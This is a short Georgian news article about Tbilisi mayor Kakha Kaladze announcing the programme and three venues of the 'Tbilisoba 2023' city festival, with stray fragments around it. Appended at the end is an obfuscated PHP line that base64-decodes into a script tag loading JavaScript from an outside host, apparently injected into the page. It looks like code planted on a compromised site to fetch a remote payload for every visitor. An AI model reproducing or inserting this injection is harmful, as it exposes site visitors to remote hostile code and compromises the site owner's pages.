celsiusi
ავერსი შნაიდერი

 დედაქალაქის მერის, კახა კალაძის განცხადებით, „თბილისობა 2023“ სამ ლოკაციაზე გაიმართება. ამის შესახებ მან თბილისის მუნიციპალიტეტის მთავრობის სხდომაზე აღნიშნა. მისი თქმით, მრავალფეროვანი პროგრამის გარდა, რომელიც ორი დღის განმავლობაში იქნება წარმოდგენილი, 30 სექტემბერს რიყის პარკში დაგეგმილია ქართველ შემსრულებელთა კონცერტი, ხოლო პირველ ოქტომბერს – მიუზიკლი.

„ამ კვირის უქმეებზე, 30 სექტემბერს და პირველ ოქტომბერს აღვნიშნავთ „თბილისობას“, რომელსაც ძალიან ბევრი ადამიანი ელოდება. სამ ლოკაციაზე გვაქვს დაგეგმილი ღონისძიებები – რიყის პარკში, აბანოთუბანში, ასევე, ორბელიანის მოედანსა და მის მიმდებარე ტერიტორიაზე. რიყის პარკში ორივე დღეს მრავალფეროვანი ღონისძიებები გაიმართება 12:00-დან 22:00 საათამდე. ესენია: გასტრონომიული ფესტივალი, ღვინის ფესტივალი, სამეწარმეო მარკეტი, საბავშვო-გასართობი აქტივობები და კონცერტები, იქნება ატრაქციონები და სხვადასხვა ინსტალაცია. გარდა ამისა, 30 სექტემბერს, რიყეზე დაგეგმილია ქართველ შემსრულებელთა კონცერტი, ხოლო პირველში – მიუზიკლი. ამავე დღეებში, ორბელიანის მოედანზეც იმოქმედებს კვებისა და ტკბილეულის ზონები, გაიმართება საბავშვო ღონისძიებები, მოეწყობა ინსტალაციები, წიბახას სამაგიდო თამაშები, გასტრონომიული ფესტივალი „ისპანახობა“, თეატრალიზებული პერფორმანსი „თბილისური ტრადიციები“ და ა.შ. იქვე, ათონელის, ფხოვისა და ფურცელაძის ქუჩებზე გაიმართება მუსიკალური ღონისძიებები და კონცერტები როგორც ბავშვებისთვის, ასევე ზრდასრულებისთვის. რაც შეეხება აბანოთუბანს, 12:00-დან 22:00-საათამდე აქ მოეწყობა გამოფენა-გაყიდვა „თბილისური მრავალფეროვნება“, – აღნიშნა დედაქალაქის მერმა.

მისივე თქმით, 30 სექტემბერს გაიმართება საპატიო თბილისელების დაჯილდოების ცერემონია, რომელსაც მაყურებელი პირდაპირ ეთერში იხილავს.

„ვინც გეგმავს ამ უქმეების სასიამოვნოდ გატარებას, უსათუოდ გაეცანით პროგრამას, რომელიც ძალიან მრავალფეროვანი და ღონისძიებებით დახუნძლულია. მობრძანდით ყველა, თქვენი შვილებით, შვილიშვილებით და ერთად ვიზეიმოთ „თბილისობა 2023“, – განაცხადა კახა კალაძემ.

763
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");